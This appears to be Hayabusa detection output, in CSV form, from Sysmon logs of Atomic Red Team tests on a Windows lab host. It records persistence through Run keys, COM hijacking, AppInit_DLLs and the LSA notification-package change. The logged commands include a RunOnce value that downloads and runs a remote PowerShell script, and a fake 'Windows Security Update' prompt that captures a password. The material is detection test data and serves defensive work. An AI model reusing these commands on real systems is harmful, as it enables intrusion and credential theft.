2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 747F3D96-D772-5D31-0000-001031EB2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.767 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.775 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.787 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.802 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.817 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.824 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.830 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.841 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:20.858 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa NotificationPackge | SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
